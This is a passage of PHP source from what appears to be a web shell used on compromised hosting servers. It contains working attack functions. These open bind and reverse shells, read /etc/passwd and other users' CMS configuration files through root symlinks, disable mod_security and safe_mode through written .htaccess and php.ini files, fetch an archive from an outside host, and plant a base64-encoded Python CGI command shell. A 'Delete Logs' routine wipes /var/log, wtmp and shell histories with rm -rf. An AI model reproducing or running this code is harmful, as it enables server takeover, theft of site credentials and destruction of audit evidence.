value=\\\'query\\\'>\r\n <input type=hidden name=p2>\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <td>\r\n <select name=\\\'type\\\'>\r\n <option value="mysql" \'.(@$_POST[\'type\']==\'mysql\'?\'selected\':\'\').\'>MySql</option>\r\n <option value="pgsql" \'.(@$_POST[\'type\']==\'pgsql\'?\'selected\':\'\').\'>PostgreSql</option>\r\n </select></td>\r\n <td><input type=text name=sql_host value="\'.(empty($_POST[\'sql_host\'])?\'localhost\':htmlspecialchars($_POST[\'sql_host\'])).\'"></td>\r\n <td><input type=text name=sql_login value="\'.(empty($_POST[\'sql_login\'])?\'root\':htmlspecialchars($_POST[\'sql_login\'])).\'"></td>\r\n <td><input type=text name=sql_pass value="\'.(empty($_POST[\'sql_pass\'])?\'\':htmlspecialchars($_POST[\'sql_pass\'])).\'"></td>\r\n <td>\';\r\n $tmp = "<input type=text name=sql_base value=\'\'>";\r\n if(isset($_POST[\'sql_host\'])){ if($db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\'])) { switch($_POST[\'charset\']) { case "Windows-1251": $db->setCharset(\'cp1251\');\r\n break;\r\n case "UTF-8": $db->setCharset(\'utf8\');\r\n break;\r\n case "KOI8-R": $db->setCharset(\'koi8r\');\r\n break;\r\n case "KOI8-U": $db->setCharset(\'koi8u\');\r\n break;\r\n case "cp866": $db->setCharset(\'cp866\');\r\n break;\r\n } $db->listDbs();\r\n echo "<select name=sql_base><option value=\'\'></option>";\r\n while($item = $db->fetch()) { list($key, $value) = each($item);\r\n echo \'<option value="\'.$value.\'" \'.($value==$_POST[\'sql_base\']?\'selected\':\'\').\'>\'.$value.\'</option>\';\r\n } echo \'</select>\';\r\n } else echo $tmp;\r\n }else echo $tmp;\r\n echo \'</td>\r\n <td><input type=submit value=">>"></td>\r\n </tr>\r\n </table>\r\n <script>\r\n function st(t,l) {\r\n document.sf.p1.value = \\\'select\\\';\r\n\r\n document.sf.p2.value = t;\r\n\r\n if(l!=null)document.sf.p3.value = l;\r\n\r\n document.sf.submit();\r\n\r\n }\r\n function is() {\r\n for(i=0;\r\ni<document.sf.elements[\\\'tbl[]\\\'].length;\r\n++i)\r\n document.sf.elements[\\\'tbl[]\\\'][i].checked = !document.sf.elements[\\\'tbl[]\\\'][i].checked;\r\n\r\n }\r\n </script>\';\r\n if(isset($db) && $db->link){ echo "<br/><table width=100% cellpadding=2 cellspacing=0>";\r\n if(!empty($_POST[\'sql_base\'])){ $db->selectdb($_POST[\'sql_base\']);\r\n echo "<tr><td width=1 style=\'border-top:2px solid #666;\r\nborder-right:2px solid #666;\r\n\'><span>Tables:</span><br><br>";\r\n $tbls_res = $db->listTables();\r\n while($item = $db->fetch($tbls_res)) { list($key, $value) = each($item);\r\n $n = $db->fetch($db->query(\'SELECT COUNT(*) as n FROM \'.$value.\'\'));\r\n $value = htmlspecialchars($value);\r\n echo "<nobr><input type=\'checkbox\' name=\'tbl[]\' value=\'".$value."\'>&nbsp;\r\n<a href=# onclick=\\"st(\'".$value."\')\\">".$value."</a> (".$n[\'n\'].")</nobr><br>";\r\n } echo "<input type=\'checkbox\' onclick=\'is();\r\n\'> <input type=button value=\'Dump\' onclick=\'document.sf.p2.value=\\"download\\";\r\ndocument.sf.submit();\r\n\'></td><td style=\'border-top:2px solid #666;\r\n\'>";\r\n if(@$_POST[\'p1\'] == \'select\') { $_POST[\'p1\'] = \'query\';\r\n $db->query(\'SELECT COUNT(*) as n FROM \'.$_POST[\'p2\'].\'\');\r\n $num = $db->fetch();\r\n $num = $num[\'n\'];\r\n echo "<span>".$_POST[\'p2\']."</span> ($num) ";\r\n for($i=0;\r\n$i<($num/30);\r\n$i++) if($i != (int)$_POST[\'p3\']) echo "<a href=\'#\' onclick=\'st(\\"".$_POST[\'p2\']."\\", $i)\'>",($i+1),"</a> ";\r\n else echo ($i+1)," ";\r\n if($_POST[\'type\']==\'pgsql\') $_POST[\'p3\'] = \'SELECT * FROM \'.$_POST[\'p2\'].\' LIMIT 30 OFFSET \'.($_POST[\'p3\']*30);\r\n else $_POST[\'p3\'] = \'SELECT * FROM `\'.$_POST[\'p2\'].\'` LIMIT \'.($_POST[\'p3\']*30).\',30\';\r\n echo "<br><br>";\r\n } if((@$_POST[\'p1\'] == \'query\') && !empty($_POST[\'p3\'])) { $db->query(@$_POST[\'p3\']);\r\n if($db->res !== false) { $title = false;\r\n echo \'<table width=100% cellspacing=0 cellpadding=2 class=main>\';\r\n $line = 1;\r\n while($item = $db->fetch()) { if(!$title) { echo \'<tr>\';\r\n foreach($item as $key => $value) echo \'<th>\'.$key.\'</th>\';\r\n reset($item);\r\n $title=true;\r\n echo \'</tr><tr>\';\r\n $line = 2;\r\n } echo \'<tr class="l\'.$line.\'">\';\r\n $line = $line==1?2:1;\r\n foreach($item as $key => $value) { if($value == null) echo \'<td><i>null</i></td>\';\r\n else echo \'<td>\'.nl2br(htmlspecialchars($value)).\'</td>\';\r\n } echo \'</tr>\';\r\n } echo \'</table>\';\r\n } else { echo \'<div><b>Error:</b> \'.htmlspecialchars($db->error()).\'</div>\';\r\n } } echo "<br><textarea name=\'p3\' style=\'width:100%;\r\nheight:100px\'>".@htmlspecialchars($_POST[\'p3\'])."</textarea><br/><input type=submit value=\'Execute\'>";\r\n echo "</td></tr>";\r\n } echo "</table></form><br/><form onsubmit=\'document.sf.p1.value=\\"loadfile\\";\r\ndocument.sf.p2.value=this.f.value;\r\ndocument.sf.submit();\r\nreturn false;\r\n\'><span>Load file</span> <input class=\'toolsInp\' type=text name=f><input type=submit value=\'>>\'></form>";\r\n if(@$_POST[\'p1\'] == \'loadfile\') { $db->query("SELECT LOAD_FILE(\'".addslashes($_POST[\'p2\'])."\') as file");\r\n $file = $db->fetch();\r\n echo \'<pre class=ml1>\'.htmlspecialchars($file[\'file\']).\'</pre>\';\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionNetwork() { printHeader();\r\n $back_connect_c="";\r\n $back_connect_p="";\r\n $bind_port_c="";\r\n $bind_port_p="";\r\n echo \'<h1>Network tools</h1><div class=content>\r\n <form name=\\\'nfp\\\' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);\r\nreturn false;\r\n">\r\n <br /><span>Bind port to /bin/sh</span><br/>\r\n Port: <input type=\\\'text\\\' name=\\\'port\\\' value=\\\'443\\\'> Password: <input type=\\\'text\\\' name=\\\'pass\\\' value=\\\'smurf\\\'> Using: <select name="using"><option value=\\\'bpc\\\'>C</option><option value=\\\'bpp\\\'>Perl</option></select> <input type=submit value=">>">\r\n </form>\r\n <form name=\\\'nfp\\\' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);\r\nreturn false;\r\n">\r\n <br /><br /><span>Back-connect to</span><br/>\r\n Server: <input type=\\\'text\\\' name=\\\'server\\\' value="\'.$_SERVER[\'REMOTE_ADDR\'].\'"> Port: <input type=\\\'text\\\' name=\\\'port\\\' value=\\\'443\\\'> Using: <select name="using"><option value=\\\'bcc\\\'>C</option><option value=\\\'bcp\\\'>Perl</option></select> <input type=submit value=">>">\r\n </form><br>\';\r\n if(isset($_POST[\'p1\'])) { function cf($f,$t) { $w=@fopen($f,"w") or @function_exists(\'file_put_contents\');\r\n if($w) { @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));\r\n @fclose($w);\r\n } } if($_POST[\'p1\'] == \'bpc\') { cf("/tmp/bp.c",$bind_port_c);\r\n $out = ex("gcc -o /tmp/bp /tmp/bp.c");\r\n @unlink("/tmp/bp.c");\r\n $out .= ex("/tmp/bp ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bp")."</pre>";\r\n } if($_POST[\'p1\'] == \'bpp\') { cf("/tmp/bp.pl",$bind_port_p);\r\n $out = ex(which("perl")." /tmp/bp.pl ".$_POST[\'p2\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bp.pl")."</pre>";\r\n } if($_POST[\'p1\'] == \'bcc\') { cf("/tmp/bc.c",$back_connect_c);\r\n $out = ex("gcc -o /tmp/bc /tmp/bc.c");\r\n @unlink("/tmp/bc.c");\r\n $out .= ex("/tmp/bc ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bc")."</pre>";\r\n } if($_POST[\'p1\'] == \'bcp\') { cf("/tmp/bc.pl",$back_connect_p);\r\n $out = ex(which("perl")." /tmp/bc.pl ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bc.pl")."</pre>";\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionPortScanner() { printHeader();\r\n echo \'<h1>Port Scanner</h1>\';\r\n echo \'<div class="content">\';\r\n echo \'<form action="" method="post">\';\r\n if(isset($_POST[\'host\']) && is_numeric($_POST[\'end\']) && is_numeric($_POST[\'start\'])){ $start = strip_tags($_POST[\'start\']);\r\n $end = strip_tags($_POST[\'end\']);\r\n $host = strip_tags($_POST[\'host\']);\r\n for($i = $start;\r\n $i<=$end;\r\n $i++){ $fp = @fsockopen($host, $i, $errno, $errstr, 3);\r\n if($fp){ echo \'Port \'.$i.\' is <font color=green>open</font><br>\';\r\n } flush();\r\n } } else { echo \'<br /><br /><center><input type="hidden" name="a" value="PortScanner"><input type="hidden" name=p1><input type="hidden" name="p2">\r\n <input type="hidden" name="c" value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type="hidden" name="charset" value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n Host: <input type="text" name="host" value="localhost"/><br /><br />\r\n Port start: <input type="text" name="start" value="0"/><br /><br />\r\n Port end:<input type="text" name="end" value="5000"/><br /><br />\r\n <input type="submit" value="Scan Ports" />\r\n </form></center><br /><br />\';\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionReadable() { printHeader();\r\n echo \'<h1>Readable Dirs</h1>\';\r\n echo \'<div class="content">\';\r\n $sm = ini_get(\'safe_mode\');\r\n if($sm) { echo \'<br /><b>Error: safe_mode = on</b><br /><br />\';\r\n } else { @$passwd = fopen(\'/etc/passwd\',\'r\');\r\n if (!$passwd) { echo \'<br /><b>[-] Error : coudn`t read /etc/passwd</b><br /><br />\';\r\n } else { $pub = array();\r\n $users = array();\r\n $conf = array();\r\n $i = 0;\r\n while(!feof($passwd)) { $str = fgets($passwd);\r\n if ($i > 35) { $pos = strpos($str,\':\');\r\n $username = substr($str,0,$pos);\r\n $dirz = \'/home/\'.$username.\'/public_html/\';\r\n if (($username != \'\')) { if (is_readable($dirz)) { array_push($users,$username);\r\n array_push($pub,$dirz);\r\n } } } $i++;\r\n } echo \'<br><br>\';\r\n echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\\n"."<br />";\r\n echo "[+] Founded ".sizeof($pub)." readable public_html directories\\n"."<br /><br /><br />";\r\n foreach ($users as $user) { $path = "/home/$user/public_html/";\r\n echo $path."<br>";\r\n } echo "<br /><br /><br />[+] Complete...\\n"."<br />";\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionSymlink() { printHeader();\r\n echo \'<h1>Symlink</h1>\';\r\n $furl = \'http://\'.$_SERVER[\'SERVER_NAME\'].$_SERVER[\'REQUEST_URI\'];\r\n $expld = explode(\'/\',$furl );\r\n $burl =str_replace(end($expld),\'\',$furl);\r\n echo \'<div class="content"><center>\r\n <h3>[ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'website\\\',null)">Domains</a> ] - \r\n [ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'whole\\\',null)">Whole Server Symlink</a> ] - \r\n [ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'config\\\',null)">Config files symlink</a> ]</h3></center>\';\r\n if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'website\') { echo "<center>";\r\n $d0mains = @file("/etc/named.conf");\r\n if(!$d0mains){ echo "<pre class=ml1 style=\'margin-top:5px\'>Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=center class=\'main\' border=0 ><tr><th> Count </th><th> Domains </th><th> Users </th></tr>";\r\n $unk = array();\r\n foreach($d0mains as $d0main){ if(@eregi("zone",$d0main)){ preg_match_all(\'#zone "(.*)"#\', $d0main, $domains);\r\n flush();\r\n if(strlen(trim($domains[1][0])) > 2){ $unk[] = $domains[1][0];\r\n flush();\r\n } } } $count=1;\r\n $unk = array_unique($unk);\r\n $l=0;\r\n foreach($unk as $d){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$d));\r\n echo "<tr".($l?\' class=l1\':\'\')."><td>".$count."</td><td><a href=http://".$d."/>".$d."</a></td><td>".$user[\'name\']."</td></tr>";\r\n flush();\r\n $count++;\r\n $l=$l?0:1;\r\n } echo "</table>";\r\n } echo "</center>";\r\n } if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'whole\') { echo "<center>";\r\n @mkdir(\'sym\',0777);\r\n $hdt = "Options all \\n DirectoryIndex Sux.html \\n AddType text/plain .php \\n AddHandler server-parsed .php \\n AddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any";\r\n $hfp =@fopen (\'sym/.htaccess\',\'w\');\r\n fwrite($hfp ,$hdt);\r\n if(function_exists(\'symlink\')) { @symlink(\'/\',\'sym/root\');\r\n } $d0mains = @file(\'/etc/named.conf\');\r\n if(!$d0mains) { echo "<pre class=ml1 style=\'margin-top:5px\'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=\'center\' width=\'40%\' class=\'main\'><tr><th> Count </th><th> Domains </th><th> User </th><th> Symlink </th></tr>";\r\n $count=1;\r\n $mck = array();\r\n foreach($d0mains as $d0main){ if(@eregi(\'zone\',$d0main)){ preg_match_all(\'#zone "(.*)"#\',$d0main,$domain);\r\n flush();\r\n if(strlen(trim($domain[1][0])) >2){ $mck[] = $domain[1][0];\r\n } } } $mck = array_unique($mck);\r\n $l=0;\r\n foreach($mck as $d) { $user = posix_getpwuid(@fileowner(\'/etc/valiases/\'.$d));\r\n $ddt = $user[\'name\'];\r\n $ddt = $d;\r\n if(@eregi("\\.ir",$d) or @eregi("\\.il",$d)) { $ddt = "<div style=\' color: #FF0000 ;\r\n text-shadow: 0px 0px 1px red;\r\n \'>".$d.\'</div>\';\r\n } echo "<tr".($l?\' class=l1\':\'\')."><td>".$count++."</td><td><a target=\'_blank\' href=http://".$d.\'/>\'.$ddt.\' </a></td><td>\'.$user[\'name\']."</td><td><a href=\'sym/root/home/".$user[\'name\']."/public_html\' target=\'_blank\'>symlink </a></td></tr>";\r\n flush();\r\n $l=$l?0:1;\r\n } echo \'</table>\';\r\n } echo "</center>";\r\n } if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'config\') { echo "<center>";\r\n @mkdir(\'sym\',0777);\r\n $hdt = "Options all \\n DirectoryIndex Sux.html \\n AddType text/plain .php \\n AddHandler server-parsed .php \\n AddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any";\r\n $hfp = @fopen (\'sym/.htaccess\',\'w\');\r\n @fwrite($hfp ,$hdt);\r\n if(function_exists(\'symlink\')) { @symlink(\'/\',\'sym/root\');\r\n } $d0mains = @file(\'/etc/named.conf\');\r\n if(!$d0mains) { echo "<pre class=ml1 style=\'margin-top:5px\'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=\'center\' width=\'40%\' class=\'main\' ><tr><th> Count </th><th> Domains </th><th> Script </th></tr>";\r\n $count = 1;\r\n $l=0;\r\n foreach($d0mains as $d0main){ if(@eregi(\'zone\',$d0main)){ preg_match_all(\'#zone "(.*)"#\',$d0main,$domain);\r\n flush();\r\n if(strlen(trim($domain[1][0]))>2){ $user = posix_getpwuid(@fileowner(\'/etc/valiases/\'.$domain[1][0]));\r\n $c1 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/wp-config.php\';\r\n $ch01 = get_headers($c1);\r\n $cf01 = $ch01[0];\r\n $c2 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/blog/wp-config.php\';\r\n $ch02 = get_headers($c2);\r\n $cf02 = $ch02[0];\r\n $c3 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/configuration.php\';\r\n $ch03 = get_headers($c3);\r\n $cf03 = $ch03[0];\r\n $c4 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/joomla/configuration.php\';\r\n $ch04 = get_headers($c4);\r\n $cf04 = $ch04[0];\r\n $c5 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/includes/config.php\';\r\n $ch05 = get_headers($c5);\r\n $cf05 = $ch05[0];\r\n $c6 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/vb/includes/config.php\';\r\n $ch06 = get_headers($c6);\r\n $cf06 = $ch06[0];\r\n $c7 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/forum/includes/config.php\';\r\n $ch07 = get_headers($c7);\r\n $cf07 = $ch07[0];\r\n $c8 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'public_html/clients/configuration.php\';\r\n $ch08 = get_headers($c8);\r\n $cf08 = $ch08[0];\r\n $c9 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/support/configuration.php\';\r\n $ch09 = get_headers($c9);\r\n $cf09 = $ch09[0];\r\n $c10 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/client/configuration.php\';\r\n $ch10 = get_headers($c10);\r\n $cf10 = $ch10[0];\r\n $c11 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/submitticket.php\';\r\n $ch11 = get_headers($c11);\r\n $cf11 = $ch11[0];\r\n $c12 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/client/configuration.php\';\r\n $ch12 = get_headers($c12);\r\n $cf12 = $ch12[0];\r\n $c13 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/includes/configure.php\';\r\n $ch13 = get_headers($c13);\r\n $cf13 = $ch13[0];\r\n $c14 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/include/app_config.php\';\r\n $ch14 = get_headers($c14);\r\n $cf14 = $ch14[0];\r\n $c15 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/sites/default/settings.php\';\r\n $ch15 = get_headers($c15);\r\n $cf15 = $ch15[0];\r\n $out = \'&nbsp;\r\n\';\r\n if(strpos($cf01,\'200\') == true) { $out = "<a href=\'".$c1."\' target=\'_blank\'>Wordpress</a>";\r\n } elseif(strpos($cf02,\'200\') == true) { $out = "<a href=\'".$c2."\' target=\'_blank\'>Wordpress</a>";\r\n } elseif(strpos($cf03,\'200\') == true && strpos($cf11,\'200\') == true) { $out = " <a href=\'".$c11."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf09,\'200\') == true) { $out = " <a href=\'".$c9."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf10,\'200\') == true) { $out = " <a href=\'".$c10."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf03,\'200\') == true) { $out = " <a href=\'".$c3."\' target=\'_blank\'>Joomla</a>";\r\n } elseif(strpos($cf04,\'200\') == true) { $out = " <a href=\'".$c4."\' target=\'_blank\'>Joomla</a>";\r\n } elseif(strpos($cf05,\'200\') == true) { $out = " <a href=\'".$c5."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf06,\'200\') == true) { $out = " <a href=\'".$c6."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf07,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf08,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Client Area</a>";\r\n } elseif(strpos($cf12,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Client Area</a>";\r\n } elseif(strpos($cf13,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>osCommerce/Zen Cart</a>";\r\n } elseif(strpos($cf14,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Magento</a>";\r\n } elseif(strpos($cf15,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Drupal</a>";\r\n } else { continue;\r\n } echo \'<tr\'.($l?\' class=l1\':\'\').\'><td>\'.$count++.\'</td><td><a href=http://www.\'.$domain[1][0].\'/>\'.$domain[1][0].\'</a></td><td>\'.$user[\'name\'].\'</td><td>\'.$out.\'</td></tr>\';\r\n flush();\r\n $l=$l?0:1;\r\n } } } echo "</table>";\r\n } echo "</center>";\r\n } echo "</div>";\r\n printFooter();\r\n } function actionSafeMode() { printHeader();\r\n echo \'<h1>Safe Mode</h1>\';\r\n echo \'<div class="content">\';\r\n echo "<div class=header><center><h3><span>| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |</span></h3>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh ] files create in following dir<br>| ".$GLOBALS[\'cwd\']." |<br><br />";\r\n echo \'<a href=# onclick="g(null,null,\\\'php.ini\\\',null)">| PHP.INI | </a><a href=# onclick="g(null,null,null,\\\'ini\\\')">| .htaccess(Mod) | </a><a href=# onclick="g(null,null,null,null,\\\'sh\\\')">| .htaccess(perl) | </a></center>\';\r\n if(!empty($_POST[\'p2\']) && isset($_POST[\'p2\'])) { $fil=fopen($GLOBALS[\'cwd\'].".htaccess","w");\r\n fwrite($fil,\'<IfModule mod_security.c>\r\n Sec------Engine Off\r\n Sec------ScanPOST Off\r\n </IfModule>\');\r\n fclose($fil);\r\n } if(!empty($_POST[\'p1\'])&& isset($_POST[\'p1\'])) { $fil=fopen($GLOBALS[\'cwd\']."php.ini","w");\r\n fwrite($fil,\'safe_mode=OFF\r\n disable_functions=NONE\');\r\n fclose($fil);\r\n } if(!empty($_POST[\'p3\']) && isset($_POST[\'p3\'])) { $fil=fopen($GLOBALS[\'cwd\'].".htaccess","w");\r\n fwrite($fil,\'Options FollowSymLinks MultiViews Indexes ExecCGI\r\n AddType application/x-httpd-cgi .sh\r\n AddHandler cgi-script .pl\r\n AddHandler cgi-script .pl\');\r\n fclose($fil);\r\n } echo "<br><br /><br /></div>";\r\n echo \'</div>\';\r\n printFooter();\r\n} function actionSQLBUDDY(){ printHeader();\r\n if(!file_exists(\'yazilimlar/sqlbuddy/index.php\')){ $dizin = \'https://byr00t.co/vb/sqlbuddy.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? $name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "sqlbuddy");\r\n $zip = new ZipArchive();\r\n $file = \'sqlbuddy.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'yazilimlar/\');\r\n if(file_exists(\'sqlbuddy.zip\')){ @unlink(\'sqlbuddy.zip\');\r\n } if($cikar){ echo "<iframe src=yazilimlar/sqlbuddy/index.php width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluÅŸtu.</div>\';\r\n } } elseif(file_exists(\'yazilimlar/sqlbuddy/index.php\')){ echo "<iframe src=yazilimlar/sqlbuddy/index.php width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionDeleteLOG(){ printHeader();\r\n echo \'<h1>Delete Logs</h1>\';\r\n function cmdExe($in) { $out = \'\';\r\n if (function_exists(\'passthru\')) { ob_start();\r\n @passthru($in);\r\n $out = ob_get_clean();\r\n } else if (function_exists(\'exec\')) { @exec($in,$out);\r\n $out = @join("\\n",$out);\r\n } elseif (function_exists(\'system\')) { ob_start();\r\n @system($in);\r\n $out = ob_get_clean();\r\n } elseif (function_exists(\'shell_exec\')) { $out = shell_exec($in);\r\n } elseif (is_resource($f = @popen($in,"r"))) { $out = "";\r\n while(!@feof($f)) $out .= fread($f,1024);\r\n pclose($f);\r\n } return $out;\r\n } cmdExe("rm -rf /tmp/logs");\r\n cmdExe("rm -rf /root/.ksh_history");\r\n cmdExe("rm -rf /root/.bash_history");\r\n cmdExe("rm -rf /root/.bash_logout");\r\n cmdExe("rm -rf /usr/local/apache/logs");\r\n cmdExe("rm -rf /usr/local/apache/log");\r\n cmdExe("rm -rf /var/apache/logs");\r\n cmdExe("rm -rf /var/apache/log");\r\n cmdExe("rm -rf /var/run/utmp");\r\n cmdExe("rm -rf /var/logs");\r\n cmdExe("rm -rf /var/log");\r\n cmdExe("rm -rf /var/adm");\r\n cmdExe("rm -rf /etc/wtmp");\r\n cmdExe("rm -rf /etc/utmp");\r\n cmdExe("rm -rf $HISTFILE");\r\n cmdExe("rm -rf /var/log/lastlog");\r\n cmdExe("rm -rf /var/log/wtmp");\r\n echo \'<div style="padding:5px;\r\n">\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /tmp/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /root/.ksh_history <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /root/.bash_history <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /usr/local/apache/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /usr/local/apache/log <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/apache/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/apache/log <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/run/utmp <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/adm <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /etc/wtmp <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> $HISTFILE<br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/log/lastlog <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/log/wtmp <br>\r\n </div>\';\r\n printFooter();\r\n } function actionPython(){ printHeader();\r\n if(!is_dir(\'python\')){ mkdir(\'python\', 0755);\r\n } chdir(\'python\');\r\n$kokdosya = ".htaccess";\r\n $dosya_adi = "$kokdosya";\r\n $dosya = fopen ($dosya_adi , \'w\') or die ("Dosya a&#231;\r\n&#305;\r\nlamad&#305;\r\n!");\r\n $metin = "AddHandler cgi-script .r00t";\r\n fwrite ( $dosya , $metin ) ;\r\n fclose ($dosya);\r\n $pythonp = \'IyEvdXNyL2Jpbi9weXRob24KIyAwNy0wNy0wNAojIHYxLjAuMAoKIyBjZ2ktc2hlbGwucHkKIyBB\r\nIHNpbXBsZSBDR0kgdGhhdCBleGVjdXRlcyBhcmJpdHJhcnkgc2hlbGwgY29tbWFuZHMuCgoKIyBD\r\nb3B5cmlnaHQgTWljaGFlbCBGb29yZAojIFlvdSBhcmUgZnJlZSB0byBtb2RpZnksIHVzZSBhbmQg\r\ncmVsaWNlbnNlIHRoaXMgY29kZS4KCiMgTm8gd2FycmFudHkgZXhwcmVzcyBvciBpbXBsaWVkIGZv\r\nciB0aGUgYWNjdXJhY3ksIGZpdG5lc3MgdG8gcHVycG9zZSBvciBvdGhlcndpc2UgZm9yIHRoaXMg\r\nY29kZS4uLi4KIyBVc2UgYXQgeW91ciBvd24gcmlzayAhISEKCiMgRS1tYWlsIG1pY2hhZWwgQVQg\r\nZm9vcmQgRE9UIG1lIERPVCB1awojIE1haW50YWluZWQgYXQgd3d3LnZvaWRzcGFjZS5vcmcudWsv\r\nYXRsYW50aWJvdHMvcHl0aG9udXRpbHMuaHRtbAoKIiIiCkEgc2ltcGxlIENHSSBzY3JpcHQgdG8g\r\nZXhlY3V0ZSBzaGVsbCBjb21tYW5kcyB2aWEgQ0dJLgoiIiIKIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwojIEltcG9ydHMKdHJ5\r\nOgogICAgaW1wb3J0IGNnaXRiOyBjZ2l0Yi5lbmFibGUoKQpleGNlcHQ6CiAgICBwYXNzCmltcG9y\r\ndCBzeXMsIGNnaSwgb3MKc3lzLnN0ZGVyciA9IHN5cy5zdGRvdXQKZnJvbSB0aW1lIGltcG9ydCBz\r\ndHJmdGltZQppbXBvcnQgdHJhY2ViYWNrCmZyb20gU3RyaW5nSU8gaW1wb3J0IFN0cmluZ0lPCmZy\r\nb20gdHJhY2ViYWNrIGltcG9ydCBwcmludF9leGMKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBjb25zdGFudHMKCmZvbnRs\r\naW5lID0gJzxGT05UIENPTE9SPSM0MjQyNDIgc3R5bGU9ImZvbnQtZmFtaWx5OnRpbWVzO2ZvbnQt\r\nc2l6